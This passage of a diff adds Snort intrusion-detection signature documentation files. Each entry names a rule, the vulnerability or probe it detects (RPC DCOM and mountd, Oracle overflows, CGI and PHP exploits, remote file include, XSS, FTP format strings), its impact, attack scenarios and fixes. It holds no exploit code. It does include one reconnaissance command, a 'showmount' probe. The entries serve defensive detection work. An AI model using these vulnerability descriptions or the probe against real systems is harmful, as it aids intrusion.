+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1266.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+1266
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) mountd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port mountd is using.  Attackers can also learn what versions of the mountd protocol are accepted by mountd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as mountd run.  The mountd RPC service allows remote file system access through Network File System (NFS).  A vulnerability exists in the code that logs NFS mount activity that can cause a buffer overflow, allowing the execution of arbitrary code as root.
+
+--
+Affected Systems:
+Caldera OpenLinux Standard 1.2
+RedHat Linux 2.0, 2.1, 3.0.3, 4.0, 4.1, 4.2, 5.0, 5.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where mountd runs.  This may be a precursor to accessing mountd.
+
+--
+Ease of Attack:
+Simple.  Execute 'showmount -e host/IP'.
+
+--
+False Positives:
+If a legitimate remote user is allowed to access mountd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for mountd, not probes of the mountd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the mountd service itself. An attacker may attempt to go directly to the mountd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/121
+
+CERT
+http://www.cert.org/advisories/CA-1998-12.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS13
+
+
+--
--- /dev/null
+++ b/doc/signatures/3347.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3347
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/638.txt
@@ -0,0 +1,65 @@
+Rule: 
+
+--
+Sid: 638
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing IRIX MIPS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+-- 
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS356
+
+Phrack.com:
+http://www.phrack.com/show.php?p=56&a=15
+
+--
--- /dev/null
+++ b/doc/signatures/388.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+
+Sid:
+388
+
+--
+
+Summary:
+This event is generated when an ICMP Address Mask Request message is found on the network.  ICMP Address Mask Requests are used for automatically determining the 32-bit subnet mask for the network.
+
+--
+
+Impact:
+Attacks may use an ICMP address Mask Request to determine the subnet mask of the network.  This information can be used to help develope a network diagram in lue of more focused attacks.
+--
+
+Detailed Information:
+ICMP Address Mask Requests are defined in RFC 950 as the third method hosts may support for determing the address mask correspoding to its IP address.  In most implementations this method is not supported, and should not be normal traffic on most networks.  
+
+--
+
+Attack Scenarios:
+Attackers may use this ICMP Type to gather information about the subnet masks of a given network.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Address Mask Requests.
+--
+
+False Positives:
+Legitimate uses of ICMP Address Mask Requests exist.  Some hosts my implement this method as the final fall back option after static configuration and dynamic address mask configuration has failed.
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 17 should be blocked at the upstream firewall.  This type of ICMP request should never originate from a host outside of the protected network.
+--
+
+Contributors:
+Original Rule wirter unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/1304.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1304
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1273.txt
@@ -0,0 +1,74 @@
+Rule:
+
+
+--
+Sid:
+1273
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) selection_svc is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port selection_svc is using.  Attackers can also learn what versions of the selection_svc protocol are accepted by selection_svc.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as selection_svc run.  The selection_svc RPC service is used by SunView, an old windowing system from Sun.  A vulnerability exists in selection_svc that allows a remote user to read files that are readable by SunView. 
+
+--
+Affected Systems:
+Sun SunOS 3.5
+Sun SunOS 4.0
+Sun SunOS 4.0.1
+Sun SunOS 4.0.2
+Sun SunOS 4.0.3
+Sun SunOS 4.1
+Sun SunOS 4.1.1
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where selection_svc runs.  This may be a precursor to accessing selection_svc.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access selection_svc, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for selection_svc, not probes of the selection_svc service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the selection_svc service itself. An attacker may attempt to go directly to the selection_svc port without querying the portmapper service which, would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/8
+
+CERT
+http://www.cert.org/advisories/CA-1990-05.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS25
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000324.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000324
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ScozNet ScozNews" application running on a 
+webserver. Access to the file "template.php" using a remote file being passed 
+as the "main_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "main_path" parameter in the "template.php" script used 
+by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2789.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2789
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure obsolete_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000655.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000655
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "comment" parameter in the "guestbook.php" 
+script used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1044.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+1044
+
+--
+Summary:
+This event is generated when an attempt is made to disclose the contents of a file on an Internet Information Server (IIS) host. 
+
+--
+Impact:
+Intelligence gathering activity.  This attack can display the contents of an Activer Server Page (ASP) file or other files located on the server. 
+
+--
+Detailed Information:
+A vulnerability exists in Windows NT 4.0 Option Pack and Windows 2000 Index Server.  The Index Server is a search engine used by IIS that allows a user's browser to search for text in HTML and other documents.   The Index Server has a Hit-Hightlighting component to highlight the text that satisifies the user's query.  A vulnerability exists in the webhits.dll file used to process the search, allowing the disclosure of file contents.  The .htw file extension is used by webhits.dll to perform hit-highlighting capabilities.
+
+--
+Affected Systems:
+Hosts running Microsoft Index Server 2.0
+
+--
+Attack Scenarios:
+An attacker can attempt to disclose the contents of a file by crafting a special URL to access the Hit-Highlighting component of the Index Server. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch discussed in the referenced Microsoft Bulletin.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS237
+
+Bugtraq
+http://www.securityfocus.com/bid/1084
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0302
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
+
+
+--
--- /dev/null
+++ b/doc/signatures/2320.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2320
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ebola from PLD Software.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible.
+
+--
+Detailed Information:
+Ebola from PLD Software is used to improve the performance of Anti-Virus
+solutions on Linux systems.
+
+A buffer overflow condition is present in the authentication mechanism
+such that it may be triggered by the generation of an error message from
+an unsuccessful authentication attempt.
+
+--
+Affected Systems:
+	All versions of Ebola prior to 0.1.5
+
+--
+Attack Scenarios:
+An attacker can send specially crafted authentication attempts to the Ebola system and
+cause the buffer overflow thus presenting the opportunity to execute
+arbitrary code.
+
+--
+Ease of Attack:
+Simple. Expoits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2663.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2663
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the web server of WhatsUp Gold.
+
+--
+Impact:
+A successful attack can cause a denial of service or a buffer overflow and
+the subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+WhatsUp Gold is a Windows application that can be used to monitor the status
+of a network and the availability and performance of servers.  A vulnerability
+exists in the web server component of WhatsUp Gold that can cause a denial of
+service or buffer overflow and the subsequent execution of arbitrary code on a
+vulnerable server.  This can occur when an overly long value is passed to the
+parameter "instancename" when invoking the _maincfgret CGI. It should be noted
+that the web server is not enabled by default in WhatsUp Gold.
+
+--
+Affected Systems:
+WhatsUp Gold 8.x.
+
+--
+Attack Scenarios:
+An attacker can connect to a web-enabled WhatsUp Gold server and send
+an overly long value to the "instancename" when calling _maincfgret,
+possibly causing a denial of service or buffer overflow.
+
+--
+Ease of Attack:
+Denial of service - simple, buffer overflow - harder.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References
+
+Other:
+http://www.idefense.com/application/poi/display?id=133&type=vulnerabilities
+
+--
--- /dev/null
+++ b/doc/signatures/3142.txt
@@ -0,0 +1,77 @@
+Rule: 
+
+--
+Sid: 
+3142
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft systems using Server Message Block (SMB).
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+SMB is a client - server protocol used in sharing resources such as
+files, printers, ports, named pipes and other things, between machines
+on a network.
+
+A vulnerability in the Microsoft implementation of SMB exists due to a
+programming error which may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain unauthorized access to the target host.
+
+A malicious attacker can exploit the vulnerability by sending a
+malicious response from a server in response to a client request using
+SMB.
+
+--
+Affected Systems:
+	Microsoft Windows 2003
+	Microsoft Windows 2000
+	Microsoft Windows XP
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message from the server
+containing code of their choosing to be run on the client.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+Turn off windows file and print services.
+
+Use Samba as an alternative.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+eEye:
+http://www.eeye.com/html/research/advisories/AD20050208.html
+
+--
--- /dev/null
+++ b/doc/signatures/2624.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2624
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "unregister_user_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "privilege_type" variable
+to cause the overflow. The result could permit the attacker to gain
+escalated privileges and run code of their choosing. This attack
+requires an attacker to logon to the database with a valid username
+and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+ 
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck94.html
+
+--
--- /dev/null
+++ b/doc/signatures/1900.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1900
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/716.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+716
+
+--
+Summary:
+This event is generated when a remote user successfully connects to a telnet server. 
+
+--
+Impact:
+Remote access.  This event may be an indication of a successful telnet connection by an authorized or unauthorized user. 
+
+--
+Detailed Information:
+A message is generated by a telnet server after a successful connection.  This particular event occurs when a remote user who does not belong to the internal network successfully connects to a telnet server.  This may be a legimate connection by an authorized user or a undesired connection by an unauthorized user.  Since telnet connections are not encrypted, it is possible that user accounts and passwords may be sniffed and used by attackers.  Telnet connections are not considered to be secure especially over the Internet.  Secure shell is the recommended service for remote connectivity since it uses encrypted sessions.
+
+--
+Affected Systems:
+Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to connect to a telnet server after sniffing a username and password.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+If authorized users are allowed to connect remotely using telnet, disable this rule.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+Consider using Secure Shell instead of telnet.
+
+Block inbound telnet connections if it is not required.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0619
+
+Arachnids:
+http://www.whitehats.com/info/IDS08
+
+--
--- /dev/null
+++ b/doc/signatures/2178.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2178
+
+--
+Summary:
+This event is generated when a remote attacker attempts to exploit a 
+format string vulnerability against an FTP server during authentication.
+
+--
+
+Impact:
+Attempted Admin.  A successful format string attack could result in the
+execution of arbitrary code with the same privileges as the user running
+the FTP daemon.
+
+--
+
+Detailed Information:
+Several FTP daemons are vulnerable to format string exploits during
+authentication to the FTP server.  A successful exploit attempt could 
+result in the remote attacker gaining unauthorized root access to the 
+vulnerable system.
+
+--
+Affected Systems:
+	SmallFTP v0.99
+
+--
+
+Attack Scenarios:
+A remote attacker could use a publicly available script to exploit the 
+vulnerability an gain control of the target host.
+
+--
+
+Ease of Attack:
+Simple. Numerous attack scripts exist to exploit this vulnerabiliy.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+SmallFTPD has released an updated software package that resolve the 
+problem. It can be downloaded from:
+http://smallftpd.free.fr
+
+--
+
+Contributors:
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+http://www.securityfocus.com/bid/7474
+
+--
--- /dev/null
+++ b/doc/signatures/1249.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1249
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/490.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+490
+
+--
+
+Summary:
+This event is generated when network traffic containing the string
+BattleMail is observed.
+
+--
+
+Impact:
+Unknown
+
+--
+
+Detailed Information:
+Email communications containing the string "BattleMail" has been
+detected in network traffic going to a mail server on the protected
+network. This may indicate participation in an email gaming system by
+the recipient.
+
+--
+
+Affected Systems:
+	All email servers
+
+--
+
+Attack Scenarios:
+Not applicable
+
+--
+
+Ease of Attack:
+Simple, no exploit software required.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Not applicable
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+Battlemail:
+http://www.thaicybersoft.com/download/internet/e-mail/BattleMail/
+
+--
--- /dev/null
+++ b/doc/signatures/1997.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1997
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
